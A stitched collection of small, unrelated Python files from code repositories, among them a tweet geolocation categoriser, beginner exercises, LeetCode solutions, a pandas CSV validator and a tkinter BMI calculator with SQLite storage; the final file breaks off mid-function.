b2fb4b21d97787a5cbc70bcb56cca7a805f7075e | rishikeshd/Geo-Spatial-Analysis-using-Python | /Categorize.py | 13,163 | 3.59375 | 4 | ##############################################################
#Script is used to extract data from csv files and perform operations like
#Cleaning geo coordinates to lat, long
#Cleaning created_at to only time at which the user tweeted
#Convert coordinate system data in array from DD to DMS(Degree Minutes Seconds)
#Dividing lat,long into different squares of a geo-located matrix for city DC
#Categorizing time to different time categories like Morning, Evening and Night
import logging
import os, sys
import csv
import collections
import re
import string
import time
def ReadFromCsv():
    # Reads the raw tweet dump into three parallel module-level lists:
    # arr_id (user id), arr_cr (created_at), arr_geo ("[lat, long]" string).
    with open('all_use.csv', 'rU') as f:
        reader = csv.reader(f)
        csv.register_dialect('pipes', delimiter=',')
        reader.next()  # skip the header row (Python 2 iterator API)
        for line in reader:
            arr_id.append(line[0])
            arr_cr.append(line[1])
            arr_geo.append(line[2])
    print len(arr_id)
    print len(arr_cr)
    print len(arr_geo)
    return arr_id,arr_cr,arr_geo
def CleanCrGeo(arr_id,arr_cr,arr_geo):
    # Extracts the HH:MM:SS portion of each created_at into the module-level
    # arr_cr2 and splits each "[lat, long]" geo string into arr_lat/arr_long.
    for item,i in enumerate(arr_id):
        word=arr_cr[item]
        # created_at looks like "Wed Oct 10 20:19:24 +0000 2018"; d is the time.
        a,b,c,d,e,f=word.split(" ")
        arr_cr2.append(d)
        world=arr_geo[item]
        m,n=world.split(",")
        m=m.replace('[','')
        # NOTE(review): the longitude keeps a leading space after the comma
        # split; float() downstream tolerates it.
        n=n.replace(']','')
        arr_lat.append(m)
        arr_long.append(n)
    #print len(arr_lat)
    return arr_cr2,arr_lat,arr_long
def DDToDMS(arr_id,arr_lat,arr_long):
    # Converts decimal-degree strings into a "deg.minutesseconds" pseudo-DMS
    # string (e.g. 38.96 -> "38.5735"), appended to the module-level
    # arr_lat2 / arr_long2.
    # NOTE(review): single-digit minutes/seconds are not zero-padded and
    # seconds can round up to 60, making the string ambiguous; the grid
    # lookup downstream assumes this exact encoding, so it is left as-is.
    for i in arr_lat:
        i=float(i)
        mnt,sec = divmod(i*3600,60)
        deg,mnt = divmod(mnt,60)
        #print deg,mnt,sec
        dms_lat=str(int(deg))+"."+str(int(mnt))+str(int(round(float(sec))))
        arr_lat2.append(dms_lat)
        continue
    for j in arr_long:
        j=float(j)
        mnt,sec = divmod(j*3600,60)
        deg,mnt = divmod(mnt,60)
        #print deg,mnt,sec
        dms_long=str(int(deg))+"."+str(int(mnt))+str(int(round(float(sec))))
        arr_long2.append(dms_long)
        continue
    #print len(arr_lat2)
    #print len(arr_long2)
    return arr_lat2,arr_long2
def DivideTimeToCategory(arr_id, arr_cr2):
    # Maps each "HH:MM:SS" timestamp to a day-part label:
    #   05-11 -> "Morning", 12-17 -> "Evening", 18-23 and 00-04 -> "Night".
    # Returns a fresh list instead of appending to the module-level
    # arr_timecat, so repeated calls no longer accumulate duplicates
    # (main rebinds arr_timecat from the return value, so callers see no
    # difference). arr_id is unused but kept for interface compatibility.
    cats = []
    for t in arr_cr2:
        h, m, s = t.split(":")
        h = int(h)
        if 5 <= h <= 11:
            cats.append("Morning")
        elif 12 <= h <= 17:
            cats.append("Evening")
        elif 18 <= h <= 23 or 0 <= h <= 4:
            cats.append("Night")
        # hours outside 0-23 are silently skipped, as in the original
    return cats
def DivideLatLongIntoCategory(arr_id, arr_lat2, arr_long2):
    # Assigns each (lat, long) pair to one cell of an 8x8 grid over DC,
    # numbered "1".."64" row-major from the north-west corner; points
    # outside the grid get "0".
    #
    # Coordinates are the pseudo-DMS "deg.minsec" strings from DDToDMS, so
    # the longitude bands step 77.10, 77.08, ..., 77.00, 76.58, 76.56, 76.54
    # (minute arithmetic, not decimal). Longitudes are stored negative
    # (western hemisphere) and compared with the sign flipped.
    #
    # Fixes the original if/elif chain's cell 16, whose condition read
    # `longit >= 77.54` (impossible alongside `longit <= 76.56`) instead of
    # `>= 76.54`, so that cell was never assigned. Also returns a fresh
    # list instead of appending to the module-level arr_cat (main rebinds
    # arr_cat from the return value, so callers are unaffected).
    lat_bands = [
        (38.5750, 38.5900), (38.5600, 38.5750), (38.5450, 38.5600),
        (38.5300, 38.5450), (38.5150, 38.5300), (38.5000, 38.5150),
        (38.4850, 38.5000), (38.4700, 38.4850),
    ]
    lon_bands = [
        (77.08, 77.10), (77.06, 77.08), (77.04, 77.06), (77.02, 77.04),
        (77.00, 77.02), (76.58, 77.00), (76.56, 76.58), (76.54, 76.56),
    ]

    def _band(value, bands):
        # First matching band wins, mirroring the original chain's order,
        # so boundary values land in the lower-numbered cell.
        for index, (low, high) in enumerate(bands):
            if low <= value <= high:
                return index
        return None

    cats = []
    for item in range(len(arr_id)):
        latit = float(arr_lat2[item])
        longit = -float(arr_long2[item])
        row = _band(latit, lat_bands)
        col = _band(longit, lon_bands)
        if row is None or col is None:
            cats.append("0")
        else:
            cats.append(str(row * 8 + col + 1))
    return cats
def ExtractUniqueId(arr_id,arr_cr2,arr_lat,arr_long,arr_lat2,arr_long2,arr_timecat,arr_cat):
    #Extracting the unique ids from a large array of twitter and putting them into a dictionary
    # (Python 2 code: dict.iteritems; dict1 is the module-level defaultdict(list) created in main)
    my_dict={}
    # Map each tweet id to the list of row indices at which it occurs.
    for (ind,elem) in enumerate(arr_id):
        if elem in my_dict:
            my_dict[elem].append(ind)
        else:
            my_dict.update({elem:[ind]})
    # For every unique id, append that row's attribute vector to the global dict1.
    for key,value in my_dict.iteritems():
        #print "key(%s) has indices (%s)" %(key,value)
        for j in value:
            dict1[str(key)].append([arr_cr2[j],arr_lat[j],arr_long[j],arr_lat2[j],arr_long2[j],arr_timecat[j],arr_cat[j]])
            continue  # no-op: the loop would continue anyway
        continue  # no-op
    #print len(dict1)
    return dict1
def WriteIntoCsv(dict1):
    #Writing dictionary to csv file (Python 2: 'wb' file mode and print statements)
    # One CSV per tweet id: file1.csv, file2.csv, ... capped at 328 files.
    i=1
    print len(dict1.keys())
    for key,value in dict1.iteritems():
        #print value
        filename="file"+str(i)+".csv"
        with open(str(filename), 'wb') as fin:
            fieldnames = ['id', 'created','lat','long', 'lat2' , 'long2','timecat','cat']
            writer = csv.DictWriter(fin, fieldnames=fieldnames)
            writer.writeheader()
            # NOTE(review): range starts at 1, so the first record (value[0]) is
            # never written -- confirm whether that is intentional.
            for k in range(1,len(value)):
                writer.writerow({'id': key , 'created': value[k][0] , 'lat' : value[k][1] , 'long' : value[k][2] , 'lat2' : value[k][3] , 'long2' : value[k][4],'timecat' : value[k][5], 'cat' : value[k][6]})
            fin.close()  # redundant: the with-block already closes the file
        i=i+1
        if i>328:
            break
        continue  # no-op
def main():
    # Pipeline entry point (Python 2 script); state is shared via module globals.
    try:
        global arr_id,arr_cr,arr_geo,dict2,arr_filename,dict1,arr_cr2,arr_lat,arr_long,arr_lat2,arr_long2,arr_timecat,arr_cat
        dict1=collections.defaultdict(list)
        arr_id=[]
        arr_cr=[]
        arr_cr2=[]
        arr_timecat=[]
        arr_geo=[]
        arr_lat=[]
        arr_long=[]
        arr_lat2=[]
        arr_long2=[]
        arr_filename=[]
        arr_cat=[]
        dict2={}
        logging.basicConfig(filename='LOG_total.log', level=logging.DEBUG )
        # read CSV -> clean created/geo -> convert coordinates -> bucket by
        # time-of-day -> bucket by lat/long grid cell -> group rows per id -> write CSVs
        arr_id,arr_cr,arr_geo=ReadFromCsv()
        arr_cr2,arr_lat,arr_long=CleanCrGeo(arr_id,arr_cr,arr_geo)
        arr_lat2,arr_long2=DDToDMS(arr_id,arr_lat,arr_long)
        arr_timecat=DivideTimeToCategory(arr_id,arr_cr2)
        arr_cat=DivideLatLongIntoCategory(arr_id,arr_lat2,arr_long2)
        dict1=ExtractUniqueId(arr_id,arr_cr2,arr_lat,arr_long,arr_lat2,arr_long2,arr_timecat,arr_cat)
        WriteIntoCsv(dict1)
        logging.info(arr_cat)
    except Exception,e:
        # Python 2 'except Exception, e' syntax: log the failure and abort non-zero.
        logging.error('An error has ocurred with description %s' ,e)
        sys.exit(1)
    print "end"
if __name__=="__main__":
    main()
|
d372563bf7ce5ab6d1d01e7f236f9d04af42bfe5 | Victorvv72/TPA-Lista | /quest 3.py | 263 | 3.78125 | 4 | nascido = 0
# Read a birth year ten times and count how many people are of legal age
# (18+, age computed relative to 2021); the final print reports the count.
contador = 1
total = 0
while contador <= 10:
    contador += 1
    nascido = int(input('Em que ano você nasceu: '))
    demaior = (nascido - 2021) *-1  # age in 2021: (2021 - birth year)
    if demaior >= 18:
        total += 1
print ('{} São maiores de idade'.format (total)) |
eaeb8e0d0cde6f428b171adb48b6859daf33c21b | p4radoks/yeni | /07SortveTuples.py | 568 | 3.5625 | 4 | sayi1=[8,56,25,875,224,156,1561,2441,12]
sayi1.sort()  # sort() orders the numbers ascending, in place
print(sayi1)
print(sorted("ahmet"))  # sorted() returns the characters of 'ahmet' in alphabetical order
isim1=["ahmet","mehmet","ali"]
isim1.sort()  # sorts the names lexicographically (character by character), in place
print(isim1)
isim2=("selim","cafer","cengiz")
print(isim2)
# isim2.reverse()  # isim2 is a tuple, so it CANNOT be modified in place
|
93593fc247c1b42f7cd1c0c0d83a7ad37ece1b75 | Luucius/python01 | /while.py | 71 | 3.703125 | 4 | numero = 0
# Print 0 through 10 inclusive; 'numero' starts at 0 above and is
# incremented on the last line of the loop body.
while numero <= 10:
    print(numero)
numero = numero+1 |
94a8ab107adbc26f00b1b35c5ed9ce73f76330a3 | UWSEDS/homework-3-4-testing-exceptions-and-coding-style-kfrankc | /dataframe.py | 859 | 3.71875 | 4 | import numpy as np
import pandas as pd
import sys
def validate(file_name):
    """Validate the CSV at file_name against the reference schema in 'data.csv'.

    Checks, in order: column names match (ignoring order), column dtypes match,
    and the frame has at least one row. Prints a diagnostic and exits on the
    first failure; prints a success message when every check passes.
    """
    df = pd.read_csv(file_name)
    df_correct = pd.read_csv('data.csv')
    # Columns first: comparing the dtype Series of differently-labelled frames
    # would raise instead of producing a clean diagnostic.
    if sorted(list(df)) != sorted(list(df_correct)):
        print('Input DataFrame does not contain the expected columns.')
        sys.exit()
    if np.any(df_correct.dtypes != df.dtypes):
        print('Input DataFrame does not contain the correct data type.')
        sys.exit()
    if len(df.index) < 1:
        print("Input DataFrame does not have at least 1 row.")
        sys.exit()
    print('Congratulations, input dataframe passes all checks.')

if __name__ == '__main__':
    validate(sys.argv[1])
|
836659e3fa45b8341f2875e5cf577ac31b74841d | PhilKennedy86/DigitalCrafts-Assignments | /AlgorithymPracticeAssignmt3.py | 204 | 3.859375 | 4 | array = [0,1,2,3,4,5,6,7,8]
sum_array = 0
sum = 0  # NOTE: shadows the built-in sum() for the rest of this script
# 0 + 1 + ... + 9 = 45: the total if no number in 0-9 were missing.
for i in range(0,10):
    sum += i
# Total of the numbers actually present in 'array'.
for i in range(0,len(array)):
    sum_array += array[i]
# The difference between the two totals is the single missing number.
print("The number missing (0-9) is:")
print(sum - sum_array) |
564a34dbe481ac5c196648cd193f55d20af1f391 | coocos/leetcode | /leetcode/235_lowest_common_ancestor_of_a_binary_search_tree.py | 2,269 | 4.125 | 4 | import unittest
from leetcode.common import TreeNode
class Solution:
    """
    Iterative lowest-common-ancestor search for a binary search tree.

    A BST keeps every smaller value in a node's left subtree and every larger
    value in its right subtree. Walking down from the root: while both target
    nodes lie strictly on the same side of the current node, descend to that
    side; the first node that separates them (or equals one of them) is the
    lowest common ancestor.
    """

    def lowestCommonAncestor(self,
                             root: TreeNode,
                             p: TreeNode,
                             q: TreeNode) -> TreeNode:
        node = root
        while True:
            if p.val < node.val and q.val < node.val:
                # Both targets are smaller -> the ancestor is in the left subtree.
                node = node.left
            elif p.val > node.val and q.val > node.val:
                # Both targets are larger -> the ancestor is in the right subtree.
                node = node.right
            else:
                # The targets straddle (or match) this node: it is the answer.
                return node
class TestSolution(unittest.TestCase):
    @staticmethod
    def _sample_tree():
        # BST shared by both examples:
        #         6
        #       /   \
        #      2     8
        #     / \   / \
        #    0   4 7   9
        #       / \
        #      3   5
        root = TreeNode(6)
        root.left = TreeNode(2)
        root.left.left = TreeNode(0)
        root.left.right = TreeNode(4)
        root.left.right.left = TreeNode(3)
        root.left.right.right = TreeNode(5)
        root.right = TreeNode(8)
        root.right.left = TreeNode(7)
        root.right.right = TreeNode(9)
        return root

    def test_first_example(self):
        root = self._sample_tree()
        self.assertEqual(Solution().lowestCommonAncestor(root, root.left, root.right), root)

    def test_second_example(self):
        root = self._sample_tree()
        self.assertEqual(Solution().lowestCommonAncestor(root, root.left, root.left.right), root.left)
1421699ac02298e6cbbc0526cdfc37d57fd60d81 | vitocuccovillo/DataScienceBook | /Chapter4/SomeMath.py | 637 | 3.578125 | 4 |
def jaccard(u1, u2):
    """Jaccard similarity of two sets: |intersection| / |union|."""
    return len(u1 & u2) / float(len(u1 | u2))
if __name__ == '__main__':
    # NOTATION:
    # - list: lista = ["a", "a", "b"]   (duplicates allowed)
    # - set:  {"a", "b"}                (no duplicates)
    # - set(lista) converts a list into a set
    countries = ["ita","ita","eng","eng","usa","fra","fra","lux"]
    dist_countries = set(countries)
    print(dist_countries)
    # A dictionary of key: value pairs.
    # (renamed from 'dict', which shadowed the built-in type)
    people = {"a":"nicola","b":"vito","c":"paola"}
    print(people["a"])
    u1 = {"a","b","c","d"}
    u2 = {"a","f","d"}
    print(jaccard(u1,u2))
|
58f1195e56591f21ed98a36fcb9e683507ff901d | Kimberly07-Ernane/Python | /Pacote para dowloand/Python/ex001 (While) soma de n° pares e qtd de n° inferiores.py | 359 | 4.21875 | 4 | #Faça um programa que recebe dez números, calcule e mostre na tela:
# Read ten numbers, then report:
#   - the sum of the even numbers
#   - how many numbers are smaller than 10
# (using while)
soma = 0
inf = 0
i = 0
while i < 10:
    n = int(input('Digite um número:'))
    if n % 2 == 0:
        soma += n
    if n < 10:
        inf += 1
    i += 1  # BUG FIX: was 'i=i=1', which pinned i at 1 and looped forever
print("Soma pares", soma)
print( "Quantidade de inferiores", inf)
|
dc72686255482255b890b5e793ed674be279cb58 | amirafzali/coding-questions | /2 Key Keyboard/sol.py | 435 | 3.6875 | 4 | def minSteps(self, n):
mem = {}
def search(current):
if current in mem: return mem[current]
if current == 1: return 0
shortest = float('inf')
for i in range(2,current+1):
if current%i == 0:
shortest = min(shortest, i+search(current/i))
mem[current] = shortest
return shortest
return search(n) |
6a55e72c0b4ff225a30e67e1ce4490f92703bade | prakashzph/test | /task_two.py | 229 | 3.59375 | 4 | from math import factorial
def total_route(n, k):
    """Return the binomial coefficient C(n, k) = n! / (k! * (n-k)!).

    Uses integer floor division so the result is exact; true division
    returned an imprecise float for large n (e.g. the 20x20 grid case).
    """
    return factorial(n) // (factorial(k) * factorial(n - k))

print('Hence, the total routes for 20*20 grid is ' + str(total_route(40, 20)))  # n = 20+20 (20*20 grid), k = 20
|
5fe8aa8f932c9fe391c2d633299a92dc1ba5a22e | isemiguk/Python_Coursera | /Module_3/realNumbers.py | 733 | 4.21875 | 4 | print(float(2**100)) #пример преобразования в вещественное число
if 0.1 + 0.2 == 0.3: #это связано с представлением вещественных чисел в пайтоне
print('yes')
else:
print('no')
print('{0:.25f}'.format(0.1)) #пример указания вывода количества знаков после запятой
print(0.5.as_integer_ratio()) #пример хранения в виде дроби (числитель и знаменатель)
# пример сравнения вещественных чисел
x = float(input())
y = float(input())
epsilon = 10 ** -6
if abs(x - y) < epsilon:
print('yes')
else:
print('yes') |
55a7add24ddca32e4511760cc244b81e3f51d9da | KYOUNGSOO-LEE/project_euler | /Project_Euler(python)/PE21-30/PE27.py | 743 | 3.640625 | 4 | #PE27 Quadratic primes
import time
import math
def formula(n, a, b):
    """Evaluate the quadratic n^2 + a*n + b."""
    return (n + a) * n + b
def isprime(n):
    """Trial-division primality test over 2 .. floor(sqrt(|n|)).

    Mirrors the original semantics exactly: 0, 1 and -1 report True, and a
    negative n is judged by the divisors of its absolute value.
    """
    limit = math.floor(math.sqrt(abs(n)))
    return all(n % d != 0 for d in range(2, limit + 1))
# Project Euler 27: find a, b maximising the run of consecutive n = 0, 1, 2...
# for which n^2 + a*n + b is prime, then report the run length and a*b.
start = time.time()
best_run = 0
best_product = 0
odd_a_values = [num for num in range(-1000, 1001) if num % 2 == 1]
prime_b_values = [num for num in range(-1000, 1001) if isprime(num) is True]
for a in odd_a_values:
    for b in prime_b_values:
        n = 0
        # Count consecutive prime values of the quadratic.
        while isprime(formula(n, a, b)):
            n += 1
        if n > best_run:
            best_run = n
            best_product = a * b
print(best_run, best_product)
print(time.time() - start, "seconds")
|
daff17f511c7aff195422a8efc96cc57e9865b2b | alkhalifas/Development-of-a-GUI-BMI-Calculator-using-Python-and-tkinter | /salkhali@bu.edu_Project/bmi_calculator_final.py | 7,053 | 3.65625 | 4 | # -*- coding: utf-8 -*-
"""
Created on Sat May 4 15:06:44 2019
@author: alkhalifas
"""
# Import packages:
# Import tkinter to build the GUI interface of this app:
from tkinter import *
# Import sqlite to store the data we will generate:
import sqlite3
# Import time to manage the time of our entries:
import time
import datetime
# import image to add BU logo:
from PIL import Image
from PIL import ImageTk, Image
# Connect to the SQL database and create a shortcut for easy access:
BMIDB = sqlite3.connect("bmidatabase.db")
c = BMIDB.cursor()
class Welcome():
    """Main menu window: greeting, current time, and navigation buttons."""

    def __init__(self, master):
        self.master = master
        self.master.geometry('260x260+100+200')
        self.master.title('Welcome')
        self.master.configure(background='white')
        import random
        # FIX: pick one adjective uniformly. The original ran randint(1, 4)
        # inside a pointless 10-iteration loop, so index 0 ('Amazing') could
        # never be selected.
        happy = ['Amazing', 'Wonderful', 'Great', 'Awesome', 'Perfect']
        happyword = random.choice(happy)
        finalHappyText = "The " + happyword + " Boston University BMI Calculator"
        self.label1 = Label(self.master, text=finalHappyText, fg='red', background='white').grid(row=1, column=1)
        # img = ImageTk.PhotoImage(Image.open("bu1.png"))
        # self.label2 = Label(self.master, image = img).grid(row=0, column=1)
        today = datetime.datetime.now()
        self.label3 = Label(self.master, text=today, fg='black', background='white').grid(row=8, column=1)
        self.button1 = Button(self.master, text="BMI Calculator", fg='blue', command=self.gotobmicalculator).grid(row=3, column=1)
        self.button2 = Button(self.master, text="Records", fg='blue', command=self.gotorecords).grid(row=5, column=1)
        self.button4 = Button(self.master, text="Exit", fg='blue', command=self.exit).grid(row=7, column=1)

    def exit(self):
        """Close the main window (and with it the application)."""
        self.master.destroy()

    def gotobmicalculator(self):
        """Open the BMI calculator in a child window."""
        root2 = Toplevel(self.master)
        myGUIO = bmicalculator(root2)

    def gotorecords(self):
        """Open the stored-records view in a child window."""
        root2 = Toplevel(self.master)
        mygui = records(root2)
class bmicalculator():
    #class created for the bmi calculator GUI: reads height/weight, computes
    #BMI, and optionally stores the result in the BMIStorage SQLite table.
    def __init__(self,master):
        # Create the storage table on first use (module-level cursor 'c').
        c.execute('CREATE TABLE IF NOT EXISTS BMIStorage(timestamp TEXT,bodymassindex REAL,weightclass TEXT)')
        self.heightcm=DoubleVar()
        self.weightkg=DoubleVar()
        self.master=master
        self.master.geometry('260x250+100+200')
        self.master.title('BMI Calculator')
        self.master.configure(background='white')
        # NOTE: label2 is reassigned three times; .grid() returns None, so
        # these attributes only serve to build the widgets.
        self.label2=Label(self.master,text='Welcome to the BMI Calculator',fg='red').grid(row=0,column=0)
        self.label2=Label(self.master,text='Please enter your height in centimetres',fg='black').grid(row=3,column=0)
        self.label2=Label(self.master,text='Please enter your weight in kilograms',fg='black').grid(row=4,column=0)
        self.myheight=Entry(self.master,textvariable=self.heightcm).grid(row=3,column=1)
        self.myweight=Entry(self.master,textvariable=self.weightkg).grid(row=4,column=1)
        self.button4=Button(self.master,text="Calculate BMI",fg='blue',command=self.bmicalculation).grid(row=7,column=0)
        self.button5=Button(self.master,text="Exit",fg='blue',command=self.exit).grid(row=9,column=0)
    def bmicalculation(self):
        # BMI = weight[kg] / (height[m])^2; height is entered in centimetres.
        bmiheight=self.heightcm.get()
        bmiweight=self.weightkg.get()
        bmi= float((bmiweight)/((bmiheight / 100)**2))
        bmi = round(bmi, 4)
        self.bmi = bmi
        self.label1=Label(self.master,text='Your BMI is %.2f' % bmi).grid(row=5,column=0)
        # Classify into a weight band and remember it for dynamic_data_entry.
        if bmi <= 18.5:
            self.label2=Label(self.master,text='You are slightly underweight.',fg='blue').grid(row=6,column=0)
            totalindex = 'underweight'
            self.totalindex = totalindex
        elif bmi >18.5 and bmi <25:
            self.label3=Label(self.master,text='You are in the healthy weight group.',fg='green').grid(row=6,column=0)
            totalindex = 'healthy'
            self.totalindex = totalindex
        elif bmi >= 25 and bmi < 30:
            self.label4=Label(self.master,text='You are slightly overweight.',fg='orange').grid(row=6,column=0)
            totalindex = 'overweight'
            self.totalindex = totalindex
        elif bmi >=30:
            self.label5=Label(self.master,text='You are in the obese weight group.',fg='red').grid(row=6,column=0)
            totalindex = 'obese'
            self.totalindex = totalindex
        # Show the "Store Data" button once a (positive) BMI has been computed.
        if bmi >0 and bmi <999999999999999999999:
            self.button6=Button(self.master,text="Store Data",fg='red',command=self.dynamic_data_entry).grid(row=8,column=0)
    def dynamic_data_entry(self):
        # Persist (date, bmi, class) into SQLite via a parameterized INSERT.
        # NOTE(review): this 'global' names the method itself and has no effect.
        global dynamic_data_entry
        timestamp = str(datetime.datetime.now().date())
        bodymassindex = self.bmi
        weightclass = self.totalindex
        c.execute("INSERT INTO BMIStorage (timestamp, bodymassindex, weightclass) VALUES (?, ?, ?)",(timestamp, bodymassindex, weightclass))
        BMIDB.commit()
        self.writetodatabase()
    def writetodatabase(self):
        # Simply pauses for one second (the loop body runs exactly once).
        for i in range(1):
            time.sleep(1)
    def exit(self):
        self.master.destroy()
class records():
    # Read-only viewer: lists every row of the BMIStorage table in a grid of labels.
    def __init__(self,master):
        self.master=master
        self.master.geometry('500x500+100+200')
        self.master.configure(background='white')
        self.master.title('Records')
        # Opens its own connection rather than reusing the module-level one.
        self.connection = sqlite3.connect('bmidatabase.db')
        self.cur = self.connection.cursor()
        self.dateLabel = Label(self.master, text="Date", width=10)
        self.dateLabel.grid(row=0, column=0)
        self.BMILabel = Label(self.master, text="BMI", width=10)
        self.BMILabel.grid(row=0, column=1)
        self.stateLabel = Label(self.master, text="Status", width=10)
        self.stateLabel.grid(row=0, column=2)
        self.showallrecords()
        self.button4=Button(self.master,text="Return",fg='red',command=self.exit).grid(row=7,column=0)
    def showallrecords(self):
        # One grid row per stored record; +1 offsets past the header row.
        data = self.readfromdatabase()
        for index, dat in enumerate(data):
            Label(self.master, text=dat[0]).grid(row=index+1, column=0)
            Label(self.master, text=dat[1]).grid(row=index+1, column=1)
            Label(self.master, text=dat[2]).grid(row=index+1, column=2)
    def readfromdatabase(self):
        # Returns all rows as (timestamp, bodymassindex, weightclass) tuples.
        self.cur.execute("SELECT * FROM BMIStorage")
        return self.cur.fetchall()
    def exit(self):
        # NOTE(review): the sqlite connection is never closed here.
        self.master.destroy()
def main():
root = Tk()
myGUIWelcome = Welcome(root)
root.mainloop()
if __name__ == '__main__':
main() |
4c7ae7979bd84acd065a36b1394463ef8ae5b05a | thakur-nishant/LeetCode | /818.RaceCar.py | 1,688 | 4.34375 | 4 | """
Your car starts at position 0 and speed +1 on an infinite number line. (Your car can go into negative positions.)
Your car drives automatically according to a sequence of instructions A (accelerate) and R (reverse).
When you get an instruction "A", your car does the following: position += speed, speed *= 2.
When you get an instruction "R", your car does the following: if your speed is positive then speed = -1 , otherwise speed = 1. (Your position stays the same.)
For example, after commands "AAR", your car goes to positions 0->1->3->3, and your speed goes to 1->2->4->-1.
Now for some target position, say the length of the shortest sequence of instructions to get there.
Example 1:
Input:
target = 3
Output: 2
Explanation:
The shortest instruction sequence is "AA".
Your position goes from 0->1->3.
Example 2:
Input:
target = 6
Output: 5
Explanation:
The shortest instruction sequence is "AAARA".
Your position goes from 0->1->3->7->7->6.
"""
import queue
class Solution:
    def racecar(self, target: 'int') -> 'int':
        """Shortest instruction sequence (BFS over (position, speed) states)."""
        pending = queue.Queue()
        pending.put((0, 0, 1))          # (steps taken, position, speed)
        seen = set()
        while not pending.empty():
            steps, pos, vel = pending.get()
            if pos == target:
                return steps
            # Successor states: Accelerate, then Reverse.
            successors = (
                (pos + vel, vel * 2),
                (pos, -1 if vel > 0 else 1),
            )
            for nxt_pos, nxt_vel in successors:
                # Prune anything at or beyond twice the target; it can never
                # be on a shortest path.
                if (nxt_pos, nxt_vel) not in seen and nxt_pos < target * 2:
                    seen.add((nxt_pos, nxt_vel))
                    pending.put((steps + 1, nxt_pos, nxt_vel))
# Smoke run on a large target; the BFS may take noticeable time.
target = 5478
print(Solution().racecar(target))
|
163286a8625a95612274c82209f4027b35a1dcef | YXChen512/LeetCode | /7_reverseString.py | 991 | 3.671875 | 4 | class Solution(object):
    def __init__(self):
        # Caches the most recent result (populated by the driver code below).
        self.solution = None
def reverse(self, x):
"""
:type x: int32
:rtype: int32
"""
if x == 0:
return x
isNegative = x < 0
value = abs(x)
digits = []
while value >0:
digits.append(value % 10)
value = value / 10
m = len(digits)
digits = digits[::-1]
reverse = 0
# type(reverse) = int32
for i in range(m):
reverse += digits[i] * 10**i
if isNegative:
if reverse >2**31:
print("Overflowed!")
return 0
else:
return (-1)*reverse
else: # input is positive
if reverse > (2**31 -1):
print('Overflowed')
return 0
else:
return reverse
solver = Solution()
solver.solution = solver.reverse(-2000000992)
# Expect 0: the reversed magnitude 2990000002 exceeds the int32 maximum.
print(solver.solution)
|
8675c6f941a0cdf4fef1dccb5e551bef45016e5c | MalwiB/academic-projects | /Algorithms_Data_Structures_Python/4/4.6.py | 314 | 3.578125 | 4 | def sum_seq(sequence):
suma = 0
for item in sequence:
if isinstance(item, (list, tuple)):
suma += sum_seq(item)
else:
suma += item
return suma
# Demo (Python 2 print statements): a nested sequence mixing lists and tuples.
seq = [ [1,2,3,4], 1, 2, [6, 7], 1, [1, [6, 2, 3], (2, 3, 4)]]
print seq
print "\nSuma liczb w powyzszej sekwencji zagniezdzonej wynosi",
print sum_seq(seq) |
04b4c895efad5e538370dccd756fc252466ea4d1 | scorp6969/Python-Tutorial | /variable/string_methods.py | 570 | 4.09375 | 4 | name = 'rambo rocky'
n = 'ramborocky'      # no space, so isalpha() below returns True
name2 = 'RAMBO ROCKY'
# length of the string (the space counts)
print(len(name))
# index of the first occurrence of 'm' (-1 if absent)
print(name.find('m'))
# capitalize the first character; the rest become lowercase
print(name.capitalize())
# uppercase every character
print(name.upper())
# lowercase every character
print(name2.lower())
# True only if every character is a digit (False here)
print(name.isdigit())
# True only if every character is alphabetic (a space would make it False)
print(n.isalpha())
# number of occurrences of 'o'
print(name.count('o'))
# replace every 'o' with 'i' (returns a new string; strings are immutable)
print(name.replace('o', 'i')) |
96e166ac2b0f611583b62da6564fda03fdeb088d | feuer95/Thesis | /Python/LPF_graph.py | 270 | 3.796875 | 4 | # -*- coding: utf-8 -*-
"""
Created on Tue Jul 16 10:59:53 2019
@author: elena
"""
import matplotlib.pyplot as plt
import numpy as np
x = np.linspace(0, 10)
# Three lines through the origin with slopes 1, 5 and 0.30, all in black.
for slope in (1, 5, 0.30):
    plt.plot(x, slope * x, c='black')
plt.show() |
05c49d05ee024731921a84e51520bdb12a422e73 | simonryu/python_study | /예제 소스 코드/04교시/미니문법/if_sample.py | 58 | 3.53125 | 4 | for i in range(1, 4):
    # Only the final counter value passes the test, so the loop prints just "3".
    if i == 3:
        print(i)
|
b794d62d8c26efb939a30351d5c8d5ce85ce9822 | simonaculda/LeetCode | /Array_and_Strings/reverseWordInS3.py | 930 | 4.25 | 4 | """
Given a string, you need to reverse the order of characters in each word within a sentence while
still preserving whitespace and initial word order.
Example 1:
Input: "Let's take LeetCode contest"
Output: "s'teL ekat edoCteeL tsetnoc"
Note: In the string, each word is separated by single space and there will not be any extra space in the string.
https://leetcode.com/problems/reverse-words-in-a-string-iii/
"""
def reverseWords(s):
    """Reverse the characters of each word, keeping the word order.

    :param s: str
    :return: str
    """
    return ' '.join(word[::-1] for word in s.split())
def test():
    # Table-driven checks covering the example, a plain sentence, the empty
    # string and a single word.
    cases = [
        ("Let's take LeetCode contest", "s'teL ekat edoCteeL tsetnoc"),
        ("Hello word", "olleH drow"),
        ("", ""),
        ("Hi", "iH"),
    ]
    for text, expected in cases:
        assert reverseWords(text) == expected


if __name__ == '__main__':
    test()
|
8a2575392496745623b60b92d88e5ef4965884ae | sdanil-ops/stepik-beegeek-python | /week2/task26.py | 1,249 | 3.84375 | 4 | # -----------------------------------------------------------
# Copyright (c) 2021. Danil Smirnov
# program for converting the value of the time interval
# specified in minutes into the value expressed
# in hours and minutes.
# -----------------------------------------------------------
from task1 import TestUnit
class TimeInterval:
    """A duration in minutes, split into whole hours plus leftover minutes."""

    def __init__(self, minutes: int):
        self.minutes = minutes
        # divmod yields (whole hours, leftover minutes) in a single step.
        self.complete_hours, self.rest_minutes = divmod(minutes, 60)

    def get_complete_hours(self):
        """Return the number of complete hours."""
        return self.minutes // 60

    def get_rest_minutes(self):
        """Return the number of minutes remaining after the complete hours."""
        return self.minutes % 60

    def __repr__(self):
        return f'{self.minutes} мин - это {self.complete_hours} час {self.rest_minutes} минут.'
# ------------- testing -------------
# TestUnit (imported from task1) instantiates TimeInterval(150) and compares
# its repr() against the expected string, exposing the outcome via .is_passed.
if __name__ == '__main__':
    test = TestUnit(TimeInterval, 150, '150 мин - это 2 час 30 минут.')
    print('passed' if test.is_passed else 'failed')
# ------------- running -------------
# if __name__ == '__main__':
# time_interval = TimeInterval(int(input()))
# print(time_interval)
|
db185c77d0e2b15393a1a5ef086f53b34ed76525 | MattCotton20/Battleships | /random_guessing.py | 609 | 3.578125 | 4 | from battleships import *
def random_guessing(size, ships, print_output):
